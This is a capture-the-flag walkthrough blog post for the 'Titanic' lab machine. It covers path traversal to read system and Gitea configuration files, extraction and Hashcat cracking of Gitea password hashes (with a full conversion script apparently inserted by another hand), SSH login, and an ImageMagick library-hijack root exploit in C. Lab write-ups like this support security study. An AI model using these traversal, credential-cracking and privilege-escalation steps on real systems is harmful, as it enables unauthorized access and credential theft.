Titanic

Nmap Scan

First, I performed an Nmap scan to identify open ports and running services:

sudo nmap -sC -sV -T4 10.10.11.55

Website Enumeration

While exploring the website, I found a Book Your Trip button that triggers a form submission.


After filling out the form and intercepting the request with Burp Suite, I followed the redirect and discovered an endpoint vulnerable to Path Traversal: /download?ticket=.

Path Traversal Exploit

By reading /etc/passwd through the path traversal, I found a user named developer and retrieved the user flag from:

/home/developer/user.txt

Subdomain Discovery

I continued using the path traversal to read system files such as /etc/hosts, where I discovered a subdomain named dev.

I added the subdomain to my /etc/hosts file.

Exploiting Gitea for Credentials

The server was running Gitea on the dev subdomain. I enumerated for its configuration file and found it:

curl -X GET "http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/conf/app.ini"

By analyzing the configuration, I located the database at:

/data/gitea/gitea.db

I then opened it with SQLite:

sqlite3 _home_developer_gitea_data_gitea_gitea.db

Cracking the Hash

By default, Gitea uses PBKDF2-HMAC-SHA256 with a high iteration count for password hashing. It stores the salt and password hash as hex-encoded values in separate columns within the database. However, Hashcat requires a single string with base64-encoded segments for cracking.

So I wrote a script that extracts user hashes from a Gitea SQLite database and converts them into a Hashcat-compatible format; you can explore it here: Gitea2Hashcat.
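The conversion such a script has to perform, as an added example that is not the author's Gitea2Hashcat tool: it reads the hex-encoded passwd and salt columns from a Gitea user table, emits hashcat -m 10900 lines in user:sha256:iterations:base64 salt:base64 hash form (for --user), and re-derives one hash to confirm a candidate password offline. The user rows are a constructed fixture, not data from the box, and the 50000-iteration / 50-byte defaults assumed for a bare "pbkdf2" algorithm tag are an assumption about Gitea's defaults.

```python
import base64
import hashlib
import hmac
import sqlite3

DEFAULT_ITER, DEFAULT_KEYLEN = 50000, 50  # bare "pbkdf2" tag defaults (assumption)

def pbkdf2_params(algo):
    """Parse Gitea's passwd_hash_algo column: 'pbkdf2' or 'pbkdf2$iter$keylen'."""
    parts = algo.split("$")
    if parts[0] != "pbkdf2":
        return None  # argon2/bcrypt/scrypt rows need a different hashcat mode
    if len(parts) == 3:
        return int(parts[1]), int(parts[2])
    return DEFAULT_ITER, DEFAULT_KEYLEN

def gitea_to_hashcat(conn):
    """Emit 'user:sha256:iter:b64salt:b64hash' lines for hashcat -m 10900 --user."""
    lines = []
    for name, passwd, salt, algo in conn.execute(
            "SELECT name, passwd, salt, passwd_hash_algo FROM user"):
        params = pbkdf2_params(algo)
        if params is None:
            continue
        # Gitea stores both columns hex-encoded; hashcat wants base64 of the raw bytes
        salt_b64 = base64.b64encode(bytes.fromhex(salt)).decode()
        hash_b64 = base64.b64encode(bytes.fromhex(passwd)).decode()
        lines.append(f"{name}:sha256:{params[0]}:{salt_b64}:{hash_b64}")
    return lines

def check_candidate(hashcat_line, candidate):
    """Re-derive PBKDF2-HMAC-SHA256 for one line; True only if candidate is the password."""
    _user, _algo, iters, salt_b64, hash_b64 = hashcat_line.split(":")
    digest = base64.b64decode(hash_b64)
    derived = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                  base64.b64decode(salt_b64), int(iters), len(digest))
    return hmac.compare_digest(derived, digest)

def build_sample_db():
    """Constructed fixture (not data from the box): one pbkdf2 user plus one argon2 user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, passwd TEXT, salt TEXT, passwd_hash_algo TEXT)")
    salt = bytes(range(16))  # Gitea's salt column is 16 random bytes, hex-encoded
    digest = hashlib.pbkdf2_hmac("sha256", b"Sample-Pass-1", salt, DEFAULT_ITER, DEFAULT_KEYLEN)
    conn.execute("INSERT INTO user VALUES (?, ?, ?, ?)", ("developer", digest.hex(), salt.hex(), "pbkdf2"))
    conn.execute("INSERT INTO user VALUES (?, ?, ?, ?)", ("bob", "00", "00", "argon2"))
    return conn

if __name__ == "__main__":
    print("\n".join(gitea_to_hashcat(build_sample_db())))
```

Against a real dump, pass sqlite3.connect("gitea.db") to gitea_to_hashcat and write the lines to the hash file; rows using a non-PBKDF2 algorithm are skipped because they need a different hashcat mode.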

hashcat gitea.hashes /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --user

and I retrieved the password.

SSH Access

Using the cracked password, I logged into the machine via SSH:

ssh developer@10.10.11.55

Privilege Escalation

While exploring the system, I found a script running as root at /opt/scripts:


The script used an ImageMagick version vulnerable to Arbitrary Code Execution. A quick Google search led me to this PoC:

Arbitrary Code Execution in AppImage version ImageMagick

gcc -x c -shared -fPIC -o /opt/app/static/assets/images/libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("cat /root/root.txt > /tmp/root44_flag.txt");
exit(0);
}
EOF
touch test.jpg

Retrieving the Root Flag

After triggering the exploit, I retrieved the root flag from /tmp/root44_flag.txt.


Titanic
https://dahmanisec.me/posts/titanic/
Author
Abderrahim Dahmani
Published at
2025-02-23
License
CC BY-NC-SA 4.0